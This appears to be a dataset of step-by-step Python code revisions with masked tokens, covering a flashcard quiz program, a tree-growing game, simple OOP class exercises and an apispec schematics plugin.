"step-5": "import argparse\nimport pandas as pd\nimport random\nimport time\n\nclass Deck:\n\tdef __init__(self, num_cols, front, back):\n\t\tself.flashcards = []\n\t\tself.num_cols = num_cols\n\t\tself.front = front\n\t\tself.back = back\n\nclass Flashcard:\n\tdef __init__(self, deck, front, back, column, row):\n\t\tself.deck = deck\n\t\tself.front = front\n\t\tself.back = back\n\t\tself.column = column\n\t\tself.row = row\n\t\tself.correct = False\n\n\tdef show_front(self):\n\t\tr = \"{}: {}\".format(self.deck.front, self.front)\n\t\treturn r\n\n\tdef show_back(self):\n\t\treturn \"{}: {}\".format(self.deck.back, self.back)\n\n\tdef show_card(self):\n\t\treturn \"{}: {}, {}: {}\".format(self.deck.front, self.front, self.deck.back, self.back)\n\n\tdef show_reverse(self):\n\t\treturn \"{}: {}, {}: {}\".format(self.deck.back, self.back, self.deck.front, self.front)\n\n\ndef create_deck(filename, num_cols):\n\tdf = pd.read_excel(filename)\n\tfront = df.columns.values[0]\n\tback = df.columns.values[1]\n\n\tdeck = Deck(num_cols, front, back)\n\tfor i in range(num_cols):\n\t\tfront_column = \"{}.{}\".format(front, i) if i else front\n\t\tback_column = \"{}.{}\".format(back, i) if i else back\n\t\tfor row in range(df[front_column].size):\n\t\t\tf = df[front_column][row]\n\t\t\tb = df[back_column][row]\n\t\t\tif not (pd.isnull(f) or pd.isnull(b)):\t\n\t\t\t\tfc = Flashcard(deck, f.strip(), b.strip(), i, row)\n\t\t\t\tdeck.flashcards.append(fc)\n\t\n\treturn deck\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n\tflashcards = [fc for fc in deck.flashcards if fc.column == first_letter or first_letter == -1]\n\treturn flashcards[start_index:number_of_cards+start_index]\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n\tflashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)\n\tplay_cards(mode, deck, flashcards)\n\ndef play_cards(mode, deck, cards):\n\tsource = deck.front if mode%2 == 0 else deck.back\n\ttarget = deck.back if mode%2 == 0 else deck.front\n\n\tif mode >= 2:\n\t\trandom.shuffle(cards)\n\n\tnum_cards = len(cards)\n\tstart_time = time.time()\n\n\tfor i, fc in enumerate(cards):\n\t\tsource_word = fc.front if mode%2==0 else fc.back\n\t\ttarget_word = fc.back if mode%2==0 else fc.front\n\n\t\tquiz(fc, source, source_word, target, target_word, i, num_cards)\n\n\tprint(\"All Done!\")\n\tcorrect = sum(fc.correct == True for fc in cards)\n\tincorrect = len(cards) - correct\n\tprint(\"Correct: {}\".format(correct))\n\tprint(\"Incorrect: {}\".format(incorrect))\n\n\tif (incorrect):\n\t\tincorrect_cards = [fc for fc in cards if not fc.correct]\n\t\tprint(\"\\n\".join([fc.show_card() for fc in incorrect_cards]))\n\t\tagain = input(\"review incorrect words (y/n): \")\n\t\tif again == 'y' or again == '1' or again == 'да':\n\t\t\tplay_cards(mode, deck, incorrect_cards)\n\telse:\n\t\tfinish_time = time.time()\n\t\ttime_diff = time.gmtime(finish_time - start_time)\n\t\tavg_time = time.gmtime((finish_time - start_time) / num_cards)\n\t\tprint(\"Total Time: {}\".format(time.strftime(\"%H:%M:%S\", time_diff)))\n\t\tprint(\"Time per card: {}\".format(time.strftime(\"%H:%M:%S\", avg_time)))\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i, number_of_cards):\n\t\tprint(\"Card {}/{}\".format(i+1, number_of_cards))\n\t\tprint(\"{} word: {}\".format(source_language, source_word))\n\t\tanswer = input(\"Enter {} translation: \".format(target_language))\n\t\t\n\t\tif is_correct(answer, target_word):\n\t\t\tfc.correct = True\n\t\t\tprint(\"Correct!\")\n\t\t\n\t\telse:\n\t\t\tprint(\"Incorrect! Correct answer was: {}\".format(target_word))\n\t\t\tn = input(\"Enter {} translation for {}: \".format(target_language, source_word))\n\n\ndef is_correct(answer, target):\n\treturn format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n\t# strip whitespace and lowercase\n\tword = word.strip().lower()\n\n\t# pop off the declensions from the end\n\tword = word.split('(')\n\n\t# sort the list of meanings\n\tword[0] = word[0].split(', ')\n\tword[0].sort()\n\n\t# join the first part back together:\n\tword[0] = ', '.join(word[0])\n\n\t# now add the declensions back on\n\tword = '('.join(word)\n\t\n\treturn word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n\tflashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)\n\tfor i, card in enumerate(flashcards):\n\t\tprint(\"Card {}/{}\".format(i+1, number_of_cards))\n\t\tinput(\"{}\\nPractice: \".format(card.show_card()))\n\t\tinput(\"{}\\nPractice: \".format(card.show_front()))\n\t\tinput(\"{}\\nPractice: \".format(card.show_back()))\n\t\n\tprint(\"Done! Review learned words:\")\n\tfor card in flashcards:\n\t\tprint(\"{}\".format(card.show_card()))\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n\tnum_cols = 9\n\tdeck = create_deck(filename, num_cols)\n\tprint(\"Welcome to The Flashcard Learner!\")\n\t# print(\"Available Modes:\")\n\t# print(\"0: Quiz - Given a word in {}, provide {} translation\".format(deck.front.lower(), deck.back.lower()))\n\t# print(\"1: Quiz - Given a word in {}, provide {} translation\".format(deck.back.lower(), deck.front.lower()))\n\t# print(\"2: Mode 0 with cards given in random order\")\n\t# print(\"3: Mode 1 with cards given in random order\")\n\t# print(\"4: Learning - Shown {} and {} side by side, practice typing both\".format(deck.front.lower(), deck.back.lower()))\n\t# mode = int(input(\"Enter mode: \"))\n\t\n\tprint(\"Okay! Let's play!\")\n\tif mode == 4:\n\t\tlearn_words(deck, first_letter, start_index, number_of_cards)\n\telse:\n\t\tplay_game(deck, mode, first_letter, start_index, number_of_cards)\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"Learn flashcards\")\n\tparser.add_argument(\"filename\", help=\"name of .xlsx file with vocab\", default=\"RussianVocab.xlsx\")\n\tparser.add_argument(\"category\", type=int, help=\"e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)\")\n\tparser.add_argument(\"start\", type=int, help=\"start index (lists are 0-indexed)\")\n\tparser.add_argument(\"num\", type=int, help=\"number of cards you'd like to see\")\n\tparser.add_argument(\"mode\", type=int)\n\targs = parser.parse_args()\n\tmain(args.filename, args.category, args.start, args.num, args.mode)\n\n",
"step-ids": [
8,
17,
18,
19,
20
]
}
|
[
8,
17,
18,
19,
20
] |
import random
tree_age = 1
state = "alive"
value = 1
age_display = "Your tree have an age of: {}".format(tree_age)
state_display = "Your tree is {}.".format(state)
def tree_state(x):
if x <= 19:
state = "alive"
return state
elif x <= 49:
rand = random.randrange(tree_age, 51, 1)
if rand == 50:
state = "dead"
else:
state = "alive"
return state
else:
state = "dead"
return state
print("Welcome to your tree garden!")
while value == 1 :
print(age_display)
print(state_display)
print("Please press 1 to increase is age or 2 to quit.")
action = input("Select 1/2 ")
if action == "2" :
value = 2
elif action == "1" :
tree_age += 1
#la fonction tree_state ne se lance pas je crois
tree_state(tree_age)
print(state)
if state == "dead":
print("Sorry your tree is dead.")
quit()
else:
age_display = "Your tree have an age of: {}".format(tree_age)
else:
print("Invalid input, please enter the right input.")
if value == 2:
print("Thanks")
|
normal
|
{
"blob_id": "763f552329a0d38900e08081a1017b33cd882868",
"index": 9391,
"step-1": "<mask token>\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\nprint('Welcome to your tree garden!')\nwhile value == 1:\n print(age_display)\n print(state_display)\n print('Please press 1 to increase is age or 2 to quit.')\n action = input('Select 1/2 ')\n if action == '2':\n value = 2\n elif action == '1':\n tree_age += 1\n tree_state(tree_age)\n print(state)\n if state == 'dead':\n print('Sorry your tree is dead.')\n quit()\n else:\n age_display = 'Your tree have an age of: {}'.format(tree_age)\n else:\n print('Invalid input, please enter the right input.')\nif value == 2:\n print('Thanks')\n",
"step-3": "<mask token>\ntree_age = 1\nstate = 'alive'\nvalue = 1\nage_display = 'Your tree have an age of: {}'.format(tree_age)\nstate_display = 'Your tree is {}.'.format(state)\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\nprint('Welcome to your tree garden!')\nwhile value == 1:\n print(age_display)\n print(state_display)\n print('Please press 1 to increase is age or 2 to quit.')\n action = input('Select 1/2 ')\n if action == '2':\n value = 2\n elif action == '1':\n tree_age += 1\n tree_state(tree_age)\n print(state)\n if state == 'dead':\n print('Sorry your tree is dead.')\n quit()\n else:\n age_display = 'Your tree have an age of: {}'.format(tree_age)\n else:\n print('Invalid input, please enter the right input.')\nif value == 2:\n print('Thanks')\n",
"step-4": "import random\ntree_age = 1\nstate = 'alive'\nvalue = 1\nage_display = 'Your tree have an age of: {}'.format(tree_age)\nstate_display = 'Your tree is {}.'.format(state)\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\nprint('Welcome to your tree garden!')\nwhile value == 1:\n print(age_display)\n print(state_display)\n print('Please press 1 to increase is age or 2 to quit.')\n action = input('Select 1/2 ')\n if action == '2':\n value = 2\n elif action == '1':\n tree_age += 1\n tree_state(tree_age)\n print(state)\n if state == 'dead':\n print('Sorry your tree is dead.')\n quit()\n else:\n age_display = 'Your tree have an age of: {}'.format(tree_age)\n else:\n print('Invalid input, please enter the right input.')\nif value == 2:\n print('Thanks')\n",
"step-5": "import random\r\n\r\ntree_age = 1\r\n\r\nstate = \"alive\"\r\n\r\nvalue = 1\r\n\r\nage_display = \"Your tree have an age of: {}\".format(tree_age)\r\nstate_display = \"Your tree is {}.\".format(state)\r\n\r\ndef tree_state(x):\r\n if x <= 19:\r\n state = \"alive\"\r\n return state\r\n elif x <= 49:\r\n rand = random.randrange(tree_age, 51, 1)\r\n if rand == 50:\r\n state = \"dead\"\r\n else:\r\n state = \"alive\"\r\n return state\r\n else:\r\n state = \"dead\"\r\n return state\r\n \r\nprint(\"Welcome to your tree garden!\")\r\n\r\nwhile value == 1 :\r\n \r\n print(age_display)\r\n print(state_display)\r\n print(\"Please press 1 to increase is age or 2 to quit.\")\r\n action = input(\"Select 1/2 \")\r\n\r\n if action == \"2\" :\r\n value = 2\r\n\r\n elif action == \"1\" :\r\n tree_age += 1\r\n #la fonction tree_state ne se lance pas je crois\r\n tree_state(tree_age)\r\n print(state)\r\n if state == \"dead\":\r\n print(\"Sorry your tree is dead.\")\r\n quit()\r\n else:\r\n age_display = \"Your tree have an age of: {}\".format(tree_age)\r\n\r\n else:\r\n print(\"Invalid input, please enter the right input.\")\r\n\r\nif value == 2:\r\n print(\"Thanks\")\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Getting familiar with OOP and using Functions and Classes :)
class Dog():
species = 'mammal'
def __init__(self,breed,name):
self.breed = breed
self.name = name
def bark(self,number):
print(f'Woof! My name is {self.name} and the number is {number}')
my_dog = Dog('Corgi','RTZY')
print(type(my_dog))
print(my_dog.breed)
print(my_dog.name)
my_dog.bark(10)
class Circle():
pi = 3.14
def __init__(self,radius = 1):
self.radius = radius
self.area = radius * radius * Circle.pi
def get_circumference(self):
return (self.radius * Circle.pi) * 2
my_circle = Circle(30)
print(my_circle.area)
test = my_circle.get_circumference()
print(test)
class Animal():
def __init__(self):
print('Animal Created')
def who_am_i(self):
print('I am an animal')
def eat(self):
print('I am eating')
print('\n')
class Dog(Animal):
def __init__(self):
Animal.__init__(self)
print('Dog Created')
def bark(self):
print('Woof! Woof!')
mydog = Dog()
print(mydog.bark())
|
normal
|
{
"blob_id": "c8137aacfb0f35c9630515442d5bdda870e9908a",
"index": 4827,
"step-1": "<mask token>\n\n\nclass Circle:\n <mask token>\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\n<mask token>\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Circle:\n pi = 3.14\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\n<mask token>\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\n",
"step-3": "class Dog:\n <mask token>\n\n def __init__(self, breed, name):\n self.breed = breed\n self.name = name\n <mask token>\n\n\n<mask token>\n\n\nclass Circle:\n pi = 3.14\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\n<mask token>\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\n",
"step-4": "class Dog:\n species = 'mammal'\n\n def __init__(self, breed, name):\n self.breed = breed\n self.name = name\n\n def bark(self, number):\n print(f'Woof! My name is {self.name} and the number is {number}')\n\n\n<mask token>\nprint(type(my_dog))\nprint(my_dog.breed)\nprint(my_dog.name)\nmy_dog.bark(10)\n\n\nclass Circle:\n pi = 3.14\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\nprint(my_circle.area)\n<mask token>\nprint(test)\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\nprint('\\n')\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\nprint(mydog.bark())\n",
"step-5": "# Getting familiar with OOP and using Functions and Classes :)\nclass Dog():\n \n species = 'mammal'\n\n def __init__(self,breed,name):\n\n self.breed = breed\n self.name = name\n \n def bark(self,number):\n print(f'Woof! My name is {self.name} and the number is {number}')\n\nmy_dog = Dog('Corgi','RTZY')\nprint(type(my_dog))\nprint(my_dog.breed)\nprint(my_dog.name)\nmy_dog.bark(10)\n\nclass Circle():\n \n pi = 3.14\n\n def __init__(self,radius = 1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n \n def get_circumference(self):\n return (self.radius * Circle.pi) * 2\n\nmy_circle = Circle(30)\nprint(my_circle.area)\ntest = my_circle.get_circumference()\nprint(test)\n\nclass Animal():\n\n def __init__(self):\n print('Animal Created')\n \n def who_am_i(self):\n print('I am an animal')\n \n def eat(self):\n print('I am eating')\n\nprint('\\n')\nclass Dog(Animal):\n \n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n def bark(self):\n print('Woof! Woof!')\n\nmydog = Dog()\nprint(mydog.bark())",
"step-ids": [
10,
11,
13,
16,
18
]
}
|
[
10,
11,
13,
16,
18
] |
# -*- coding: utf-8 -*-
"""
openapi.schematics
~~~~~~~~~~~~~~~~~~
Schematics plugin for apispec based on ext.MarshmallowPlugin
"""
import warnings
from apispec import BasePlugin
from .common import resolve_schema_instance, make_schema_key
from .openapi import OpenAPIConverter
def resolver(schema):
"""Default implementation of a schema name resolver function
"""
name = schema.__name__
if name.endswith("Schema"):
return name[:-6] or name
return name
class SchematicsPlugin(BasePlugin):
"""APISpec plugin handling schematics models
:param callable schema_name_resolver: Callable to generate the schema definition name.
Receives the `Schema` class and returns the name to be used in refs within
the generated spec. When working with circular referencing this function
must must not return `None` for schemas in a circular reference chain.
Example: ::
def schema_name_resolver(schema):
return schema.__name__
"""
def __init__(self, schema_name_resolver=None):
super().__init__()
self.schema_name_resolver = schema_name_resolver or resolver
self.spec = None
self.openapi_version = None
self.openapi = None
def init_spec(self, spec):
super().init_spec(spec)
self.spec = spec
self.openapi_version = spec.openapi_version
self.openapi = OpenAPIConverter(
openapi_version=spec.openapi_version,
schema_name_resolver=self.schema_name_resolver,
spec=spec,
)
def resolve_parameters(self, parameters):
resolved = []
for parameter in parameters:
if isinstance(parameter, dict) and not isinstance(
parameter.get("schema", {}), dict
):
schema_instance = resolve_schema_instance(parameter["schema"])
if "in" in parameter:
del parameter["schema"]
resolved += self.openapi.schema2parameters(
schema_instance, default_in=parameter.pop("in"), **parameter
)
continue
self.resolve_schema(parameter)
resolved.append(parameter)
return resolved
def resolve_schema_in_request_body(self, request_body):
"""Function to resolve a schema in a requestBody object - modifies then
response dict to convert Marshmallow Schema object or class into dict
"""
content = request_body["content"]
for content_type in content:
schema = content[content_type]["schema"]
content[content_type]["schema"] = self.openapi.resolve_schema_dict(schema)
def resolve_schema(self, data):
"""Function to resolve a schema in a parameter or response - modifies the
corresponding dict to convert Marshmallow Schema object or class into dict
:param APISpec spec: `APISpec` containing refs.
:param dict|str data: either a parameter or response dictionary that may
contain a schema, or a reference provided as string
"""
if not isinstance(data, dict):
return
# OAS 2 component or OAS 3 header
if "schema" in data:
data["schema"] = self.openapi.resolve_schema_dict(data["schema"])
# OAS 3 component except header
if self.openapi_version.major >= 3:
if "content" in data:
for content_type in data["content"]:
schema = data["content"][content_type]["schema"]
data["content"][content_type][
"schema"
] = self.openapi.resolve_schema_dict(schema)
def map_to_openapi_type(self, *args):
"""Decorator to set mapping for custom fields.
``*args`` can be:
- a pair of the form ``(type, format)``
- a core marshmallow field type (in which case we reuse that type's mapping)
Examples: ::
@ma_plugin.map_to_openapi_type('string', 'uuid')
class MyCustomField(Integer):
# ...
@ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')
class MyCustomFieldThatsKindaLikeAnInteger(Integer):
# ...
"""
return self.openapi.map_to_openapi_type(*args)
def schema_helper(self, name, _, schema=None, **kwargs):
"""Definition helper that allows using a marshmallow
:class:`Schema <marshmallow.Schema>` to provide OpenAPI
metadata.
:param type|Schema schema: A marshmallow Schema class or instance.
"""
if schema is None:
return None
schema_instance = resolve_schema_instance(schema)
schema_key = make_schema_key(schema_instance)
self.warn_if_schema_already_in_spec(schema_key)
self.openapi.refs[schema_key] = name
json_schema = self.openapi.schema2jsonschema(schema_instance)
return json_schema
def parameter_helper(self, parameter, **kwargs):
"""Parameter component helper that allows using a marshmallow
:class:`Schema <marshmallow.Schema>` in parameter definition.
:param dict parameter: parameter fields. May contain a marshmallow
Schema class or instance.
"""
# In OpenAPIv3, this only works when using the complex form using "content"
self.resolve_schema(parameter)
return parameter
def response_helper(self, response, **kwargs):
"""Response component helper that allows using a marshmallow
:class:`Schema <marshmallow.Schema>` in response definition.
:param dict parameter: response fields. May contain a marshmallow
Schema class or instance.
"""
self.resolve_schema(response)
if "headers" in response:
for header in response["headers"].values():
self.resolve_schema(header)
return response
def operation_helper(self, operations, **kwargs):
for operation in operations.values():
if not isinstance(operation, dict):
continue
if "parameters" in operation:
operation["parameters"] = self.resolve_parameters(
operation["parameters"]
)
if self.openapi_version.major >= 3:
if "requestBody" in operation:
self.resolve_schema_in_request_body(operation["requestBody"])
for response in operation.get("responses", {}).values():
self.resolve_schema(response)
if "headers" in response:
for header in response["headers"].values():
self.resolve_schema(header)
def warn_if_schema_already_in_spec(self, schema_key):
"""Method to warn the user if the schema has already been added to the
spec.
"""
if schema_key in self.openapi.refs:
warnings.warn(
"{} has already been added to the spec. Adding it twice may "
"cause references to not resolve properly.".format(schema_key[0]),
UserWarning,
)
|
normal
|
{
"blob_id": "1c5655563d05498f016fb2d41a07331b9e8de5e8",
"index": 2019,
"step-1": "<mask token>\n\n\nclass SchematicsPlugin(BasePlugin):\n <mask token>\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major >= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n <mask token>\n <mask token>\n <mask token>\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-2": "<mask token>\n\n\nclass SchematicsPlugin(BasePlugin):\n <mask token>\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major >= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n schema_instance = resolve_schema_instance(schema)\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-3": "<mask token>\n\n\nclass SchematicsPlugin(BasePlugin):\n \"\"\"APISpec plugin handling schematics models\n\n :param callable schema_name_resolver: Callable to generate the schema definition name.\n Receives the `Schema` class and returns the name to be used in refs within\n the generated spec. When working with circular referencing this function\n must must not return `None` for schemas in a circular reference chain.\n\n Example: ::\n\n def schema_name_resolver(schema):\n return schema.__name__\n \"\"\"\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n 